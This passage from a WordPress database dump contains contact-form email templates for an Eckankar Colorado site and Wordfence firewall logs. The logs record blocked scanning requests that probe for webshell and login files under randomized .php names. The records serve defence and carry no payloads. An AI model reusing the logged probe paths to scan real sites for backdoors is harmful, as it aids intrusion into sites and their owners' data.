transparent;\\\">\\n<div class=\\\"u-row\\\" style=\\\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\\\">\\n<div style=\\\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\\\">\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\\\">\\n<div style=\\\"background-color: #6e6e6e; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\n<div style=\\\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\\\">\\n<table style=\\\"font-family: arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" border=\\\"0\\\" width=\\\"100%\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\">\\n<tbody>\\n<tr>\\n<td style=\\\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\n<div>\\n<div style=\\\"text-align: center; font-family: arial, helvetica, sans-serif;\\\">\\n<p style=\\\"text-align: center; font-size: 16px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif; padding: 20px;\\\">\\u00a9 Eckankar In Colorado<\\/p>\\n<\\/div>\\n<\\/div>\\n<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/div>\\n<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\",\"conditionals\":{\"status\":false,\"type\":\"all\",\"conditions\":[{\"field\":null,\"operator\":\"=\",\"value\":null}]},\"enabled\":true,\"pdf_attachments\":[],\"attachments\":[],\"media_attachments\":[],\"feed_trigger_event\":\"payment_success\",\"asPlainText\":\"no\"}'),(33,5,'notifications','{\"name\":\"User Email Confirmation\",\"sendTo\":{\"type\":\"email\",\"email\":\"{inputs.email}\",\"field\":null,\"routing\":[{\"input_value\":\"\",\"field\":null,\"operator\":\"=\",\"value\":null}]},\"fromName\":\"webmaster@eckankar-colorado.org\",\"fromEmail\":\"webmaster@eckankar-colorado.org\",\"replyTo\":\"webmaster@eckankar-colorado.org\",\"bcc\":\"\",\"subject\":\"State Leader Contact Request\",\"message\":\"<div lang=\\\"en\\\" style=\\\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\\\" role=\\\"article\\\" aria-roledescription=\\\"email\\\">\\n<table style=\\\"width: 100%; border: none; border-spacing: 0;\\\" role=\\\"presentation\\\">\\n<tbody>\\n<tr>\\n<td style=\\\"padding: 0;\\\" align=\\\"center\\\"><!-- [if mso]><\\/p>\\n<table role=\\\"presentation\\\" align=\\\"center\\\" style=\\\"width:600px;\\\"><tr><td><p>          <![endif]-->\\n<table style=\\\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\\\" role=\\\"presentation\\\">\\n<tbody>\\n<tr>\\n<td style=\\\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\\\"><img src=\\\"https:\\/\\/eckankar-colorado.org\\/wp-content\\/uploads\\/2023\\/07\\/init-esa-confirmation-blue-2.jpg\\\" alt=\\\"\\\" \\/><\\/td>\\n<\\/tr>\\n<tr>\\n<td style=\\\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 40px;\\\">\\n<p style=\\\"margin: 0;\\\"><span style=\\\"color: #1d5791; font-size: 30px; font-family: arial, helvetica, sans-serif;\\\"><strong>Colorado State Leader<\\/strong><\\/span><\\/p>\\n<p style=\\\"margin: 0;\\\"><span style=\\\"color: #1d5791; font-size: 30px; font-family: arial, helvetica, sans-serif;\\\"><strong> Contact Request<br \\/><span style=\\\"color: #c98818;\\\"><em>Confirmation Notification<\\/em><\\/span><br \\/><\\/strong><\\/span><\\/p>\\n<\\/td>\\n<\\/tr>\\n<tr>\\n<td style=\\\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\\\"><!-- [if mso]><\\/p>\\n<table role=\\\"presentation\\\" width=\\\"100%\\\"><tr><td style=\\\"width:145px; padding: 15px 10px 11px 10px;\\\" align=\\\"left\\\" valign=\\\"top\\\"><p>                <![endif]-->\\n<div class=\\\"col-lge\\\" style=\\\"display: inline-block; width: 100%; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; color: #363636;\\\">\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 22px; line-height: 28px;\\\"><b>Hello {inputs.names.first_name} and thank you for getting in touch!<br \\/><\\/b><\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 20px; line-height: 28px;\\\">You have requested contact with a Colorado State Leader. You will be hearing from us soon.<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: -5px; font-size: 20px; font-weight: 600;\\\">Here is a copy of the information that you have submitted:<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\\\">\\u00a0<\\/p>\\n<div style=\\\"padding: 20px; background-color: #f5f5f5; border-radius: 3px; border: 1px solid #cccccc;\\\">\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>FIRST NAME:<\\/b> {inputs.names.first_name}<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>LAST NAME:<\\/b> {inputs.names.last_name}<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>EMAIL:<\\/b> {inputs.email}<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>TELEPHONE: <\\/b> {inputs.input_text}<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>CHOOSE COLORADO REGION:<\\/b> {inputs.input_radio}<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>COLORADO STATE LEADER SELECTED: <\\/b>{inputs.dropdown}{inputs.dropdown_11}{inputs.dropdown_19}{inputs.dropdown_21}{inputs.dropdown_12}<\\/p>\\n<p style=\\\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\\\"><b>MESSAGE: <\\/b>{inputs.description}<\\/p>\\n<\\/div>\\n<\\/div>\\n<\\/td>\\n<\\/tr>\\n<tr>\\n<td style=\\\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\\\">You are receiving this email because you have submitted a request through the <a href=\\\"https:\\/\\/eckankar-colorado.org\\/\\\">Eckankar in Colorado<\\/a> website.If you have any questions regarding the origin of this email, please feel free to contact us, we\'re always happy to help out.<\\/td>\\n<\\/tr>\\n<tr>\\n<td style=\\\"padding: 10px; background-color: #6e6e6e;\\\">\\n<figure style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial, helvetica, sans-serif;\\\"><a href=\\\"https:\\/\\/www.facebook.com\\/people\\/Eckankar-in-Colorado\\/100067829705562\\/\\\"><img src=\\\"https:\\/\\/eckankar-colorado.org\\/wp-content\\/uploads\\/2021\\/05\\/fb-icon-email.png\\\" alt=\\\"f\\\" width=\\\"40\\\" height=\\\"40\\\" \\/><\\/a> <\\/span><\\/figure>\\n<figure style=\\\"text-align: center;\\\"><span style=\\\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\\\">\\u00a9 Eckankar In Colorado<\\/span><br \\/><span style=\\\"font-family: arial, helvetica, sans-serif;\\\"><a title=\\\"Contact Us\\\" href=\\\"mailto:webmaster@eckankar-colorado.org\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\"><span style=\\\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\\\">Contact Us<\\/span><\\/a><\\/span><\\/figure>\\n<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\\n<p><!-- [if mso]>\\n          <\\/td><\\/tr><\\/table><p>          <![endif]--><\\/p>\\n<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\\n<\\/div>\",\"conditionals\":{\"status\":false,\"type\":\"all\",\"conditions\":[{\"field\":null,\"operator\":\"=\",\"value\":null}]},\"enabled\":true,\"pdf_attachments\":[],\"attachments\":[],\"media_attachments\":[],\"feed_trigger_event\":\"payment_success\",\"asPlainText\":\"no\"}'),(38,5,'_total_views','9'),(34,6,'formSettings','{\"confirmation\":{\"redirectTo\":\"samePage\",\"messageToShow\":\"Thank you for your message. We will get in touch with you shortly\",\"customPage\":null,\"samePageFormBehavior\":\"hide_form\",\"customUrl\":null},\"restrictions\":{\"limitNumberOfEntries\":{\"enabled\":false,\"numberOfEntries\":null,\"period\":\"total\",\"limitReachedMsg\":\"Maximum number of entries exceeded.\"},\"scheduleForm\":{\"enabled\":false,\"start\":null,\"end\":null,\"selectedDays\":null,\"pendingMsg\":\"Form submission is not started yet.\",\"expiredMsg\":\"Form submission is now closed.\"},\"requireLogin\":{\"enabled\":false,\"requireLoginMsg\":\"You must be logged in to submit the form.\"},\"denyEmptySubmission\":{\"enabled\":false,\"message\":\"Sorry, you cannot submit an empty form. Let\'s hear what you wanna say.\"}},\"layout\":{\"labelPlacement\":\"top\",\"helpMessagePlacement\":\"with_label\",\"errorMessagePlacement\":\"inline\",\"cssClassName\":\"\",\"asteriskPlacement\":\"asterisk-right\"},\"delete_entry_on_submission\":\"no\"}'),(35,6,'template_name','support_form'),(36,6,'notifications','{\"name\":\"Support Form Notification\",\"sendTo\":{\"type\":\"email\",\"email\":\"{wp.admin_email}\",\"field\":null,\"routing\":[{\"email\":null,\"field\":null,\"operator\":\"=\",\"value\":null}]},\"fromName\":\"\",\"fromEmail\":\"\",\"replyTo\":\"\",\"bcc\":\"\",\"subject\":\"{inputs.subject}, Support Form\",\"message\":\"<p>{all_data}<\\/p>\",\"conditionals\":{\"status\":false,\"type\":\"all\",\"conditions\":[{\"field\":null,\"operator\":\"=\",\"value\":null}]},\"enabled\":false,\"email_template\":\"\"}'),(37,6,'_primary_email_field','email');
/*!40000 ALTER TABLE `wpcl_fluentform_form_meta` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_fluentform_form_meta` with 33 row(s)
--

--
-- Table structure for table `wpcl_wfhits`
--

DROP TABLE IF EXISTS `wpcl_wfhits`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wfhits` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `attackLogTime` double(17,6) unsigned NOT NULL,
  `ctime` double(17,6) unsigned NOT NULL,
  `IP` binary(16) DEFAULT NULL,
  `jsRun` tinyint(4) DEFAULT 0,
  `statusCode` int(11) NOT NULL DEFAULT 200,
  `isGoogle` tinyint(4) NOT NULL,
  `userID` int(10) unsigned NOT NULL,
  `newVisit` tinyint(3) unsigned NOT NULL,
  `URL` text DEFAULT NULL,
  `referer` text DEFAULT NULL,
  `UA` text DEFAULT NULL,
  `action` varchar(64) NOT NULL DEFAULT '',
  `actionDescription` text DEFAULT NULL,
  `actionData` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`ctime`),
  KEY `k2` (`IP`,`ctime`),
  KEY `attackLogTime` (`attackLogTime`)
) ENGINE=MyISAM AUTO_INCREMENT=135048 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wfhits`
--

LOCK TABLES `wpcl_wfhits` WRITE;
/*!40000 ALTER TABLE `wpcl_wfhits` DISABLE KEYS */;
INSERT INTO `wpcl_wfhits` VALUES (133539,1699888562.893248,1699888562.883900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3module.audio.flac.php','http://eckankar-colorado.org/wp-includes/ID3module.audio.flac.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEM21vZHVsZS5hdWRpby5mbGFjLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134324,1700062336.997996,1700062336.989300,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/fonts/wp-login.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZvbnRzL3dwLWxvZ2luLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134306,1700049203.840273,1700049203.830700,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/upgrade/iR7SzrsOUEP.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdXBncmFkZS9pUjdTenJzT1VFUC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134304,1700049218.058080,1700049218.048500,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/user/iR7SzrsOUEP.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3VzZXIvaVI3U3pyc09VRVAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134321,1700062351.596983,1700062351.588300,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/user/wp-login.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3VzZXIvd3AtbG9naW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134305,1700049211.109203,1700049211.096500,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/images/iR7SzrsOUEP.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ltYWdlcy9pUjdTenJzT1VFUC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134301,1700049245.295334,1700049245.282700,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/images/iR7SzrsOUEP.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2ltYWdlcy9pUjdTenJzT1VFUC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134322,1700062347.246052,1700062347.237400,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/ms.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L21zLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133512,1699888573.184395,1699888573.175700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/IRI.php','http://eckankar-colorado.org/wp-includes/SimplePie/IRI.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9JUkkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134302,1700049241.336275,1700049241.327200,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/network/iR7SzrsOUEP.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL25ldHdvcmsvaVI3U3pyc09VRVAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134303,1700049235.266692,1700049235.236000,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/js/widgets/iR7SzrsOUEP.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2pzL3dpZGdldHMvaVI3U3pyc09VRVAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133513,1699888572.854690,1699888572.846000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/File.php','http://eckankar-colorado.org/wp-includes/SimplePie/File.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9GaWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133511,1699888573.530008,1699888573.508000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Item.php','http://eckankar-colorado.org/wp-includes/SimplePie/Item.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9JdGVtLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134330,1700062296.509386,1700062296.500500,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/406.shtml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNi5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134325,1700062328.363750,1700062328.352300,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/maint/wp-login.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL21haW50L3dwLWxvZ2luLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133506,1699888575.264592,1699888575.255800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Registry.php','http://eckankar-colorado.org/wp-includes/SimplePie/Registry.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 